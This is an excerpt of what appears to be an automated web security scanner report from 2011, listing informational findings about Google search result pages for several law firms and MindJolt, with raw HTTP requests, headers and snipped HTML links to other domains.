<div class=sld><a class=sla href="http://www.porterwright.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAjAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/firm/" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAzAA')">Firm</a></div><div class=sld><a class=sla href="http://www.porterwright.com/resources/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBDAA')">Resources</a></div><div class=sld><a class=sla href="http://www.porterwright.com/client_login/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBTAA')">Client Login</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/attorneys/" class=l onmousedown="return clk(this.href,'','','','3','','0CDEQFjAC')">Attorneys | Careers | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/firm/" class=l onmousedown="return clk(this.href,'','','','4','','0CDgQFjAD')">Overview | Firm | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CD0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/people/" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')">Search | People | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html" class=l onmousedown="return clk(this.href,'','','','7','','0CE8QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.secactions.com/pdf/Gorman.pdf" class=l onmousedown="return clk(this.href,'','','','8','','0CFYQFjAH')">Thomas O. Gorman <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bankingandfinancelawreport.com/promo/about/" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')">About <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nanolawreport.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGMQFjAJ')">Nanotechnology Lawyer &amp; Attorney : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGgQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.technologylawsource.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGoQFjAK')">Technology Law Source : Technology Lawyers &amp; Attorneys for Patents <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rm7jdniJ0TsJ:www.technologylawsource.com/+Porter+Wright+Morris+%26+Arthur&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:rm7jdniJ0TsJ:www.technologylawsource.com/+Porter+Wright+Morris+%26+Arthur&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CG8QIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.vorys.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHIQoggwCw')">Vorys, Sater, Seymour and Pease LLP</a>
...[SNIP]...
<div><a href="http://www.szd.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHQQoggwDA')">Schottenstein Zox & Dunn</a>
...[SNIP]...
<div><a href="http://www.bricker.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHYQoggwDQ')">of the Bricker</a>
...[SNIP]...
<div><a href="http://www.bakerlaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHgQoggwDg')">Baker Hostetler</a>
...[SNIP]...

19.40. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=Berger+Kahn&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68673

<!doctype html> <head> <title>Berger Kahn - Google Search</title> <script>window.google={kEI:"jM_LTf6UA6e30gG5rJnFBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,29
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Berger+Kahn&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fhFNFNDl3JMJ:www.bergerkahn.com/+Berger+Kahn&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.bergerkahn.com/attorneys.php" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.bergerkahn.com/offices.php" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.bergerkahn.com/contact.php" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Contact Us</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/attorneys.php" class=l onmousedown="return clk(this.href,'','','','2','','0CCIQFjAB')">Attorneys ... <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:E5bjf_XLSEAJ:www.bergerkahn.com/attorneys.php+Berger+Kahn&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/offices.php" class=l onmousedown="return clk(this.href,'','','','3','','0CCkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:A2xkTFBWW8IJ:www.bergerkahn.com/offices.php+Berger+Kahn&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CC4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/attorneys.php/26" class=l onmousedown="return clk(this.href,'','','','4','','0CDAQFjAD')">David B. Ezra ... Attorneys ... <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IRcsuJBFBEkJ:www.bergerkahn.com/attorneys.php/26+Berger+Kahn&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/berger-kahn" class=l onmousedown="return clk(this.href,'','','','5','','0CDgQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:R-thpFnCxOoJ:www.linkedin.com/company/berger-kahn+Berger+Kahn&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD0QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elawmarketing.com/portfolio/email-marketing/berger-kahn" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')">Key Decisions email newsletter from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:I8ZD_pN5fa8J:www.elawmarketing.com/portfolio/email-marketing/berger-kahn+Berger+Kahn&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6at9UuASthwJ:www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html+Berger+Kahn&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.handtherapyspecialists.com/dir.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEoQFjAH')">Fran <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:06qQP7B8JIQJ:www.handtherapyspecialists.com/dir.html+Berger+Kahn&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner" class=l onmousedown="return clk(this.href,'','','','9','','0CFEQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:kmG0fs1pitcJ:articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner+Berger+Kahn&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CFcQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ywzG_JPWTMMJ:www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx+Berger+Kahn&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFwQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.gladstonemichel.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CF4QoggwCg')">gladstonemichel</a>
...[SNIP]...
<div><a href="http://www.helmerfriedman.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGAQoggwCw')">helmerfriedman</a>
...[SNIP]...
<div><a href="http://www.legallynanny.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGIQoggwDA')">Legally Nanny</a>
...[SNIP]...
<div><a href="http://www.robodocs.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGQQoggwDQ')">RoboDocs</a>
...[SNIP]...

19.41. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80132

<!doctype html> <head> <title>Milbank Tweed Hadley &amp; McCloy - Google Search</title> <script>window.google={kEI:"mNDLTZaSCejZ0QGC86XTBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Milbank+Tweed+Hadley+%26+McCloy&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Attorneys/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.milbank.com/en/Offices/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.milbank.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAjAA')">Careers at Milbank</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Contactus/" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoAzAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/PracticeAreas/" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBDAA')">Practice areas</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/NewsEvents/" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBTAA')">Newsroom / events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/AboutUsHistory/" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBjAA')">About us / history</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/careers/awards.html" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBzAA')">Awards &amp; rankings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Attorneys/" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CD4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/careers/" class=l onmousedown="return clk(this.href,'','','','4','','0CEAQFjAD')">Careers at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Offices/" class=l onmousedown="return clk(this.href,'','','','5','','0CEcQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy','','','','6','','0CE8QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFQQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&amp;-McCloy-LLP?companyId=403" class=l onmousedown="return clk(this.href,'','','','7','','0CFYQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFsQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/milbank-tweed-hadley-&amp;-mccloy-llp" class=l onmousedown="return clk(this.href,'','','','8','','0CFwQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=688226" class=l onmousedown="return clk(this.href,'','','','9','','0CGIQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.legal500.com/firms/50677/offices/51159" class=l onmousedown="return clk(this.href,'','','','10','','0CGgQFjAJ')">The Legal 500 &gt; <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.iflr1000.com/JurisdictionFirm/1593/130/Milbank-Tweed-Hadley--McCloy.html" class=l onmousedown="return clk(this.href,'','','','11','','0CHAQFjAK')"><em>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHcQoggwCw')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHkQoggwDA')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHsQoggwDQ')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.skadden.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CH0QoggwDg')">Skadden</a>
...[SNIP]...

19.42. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=MindJolt&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74305

<!doctype html> <head> <title>MindJolt - Google Search</title> <script>window.google={kEI:"bsTLTdrWDov2gAeKwNSFBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29757,29795
...[SNIP]...
